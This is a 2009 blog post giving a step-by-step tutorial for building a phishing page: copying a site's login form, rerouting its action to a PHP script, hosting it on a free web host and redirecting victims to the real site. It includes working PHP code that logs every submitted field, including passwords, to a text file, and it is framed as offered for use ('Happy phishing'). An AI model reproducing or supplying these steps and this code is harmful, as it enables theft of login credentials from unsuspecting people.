Monday, September 21, 2009

Tutorial on phishing!

Hi all! heres my first tutorial and its gonna be on Phishing!

allright lets get started!

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action=". you should find a command looking like this

or anything alike and probably more inside like "id=" and "autocomplete=".

4. change the url (in this case "RANDOM URL") to "write.php"

5. If the method is "post" then change it to "get"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.700megs.com. Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

9. Create a new file called "write.php" and copy / paste this:

header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.

11. Save this file (write.php), and upload it to the subdomain aswell

13. test out your website. type in something in your phisher and then go to filemanager and open the password file, what you wrote should be typed here!, you can also access the password file by going to http://www.yourdomain.700megs.com/passwordfile.txt


Happy phishing

No comments:

Post a Comment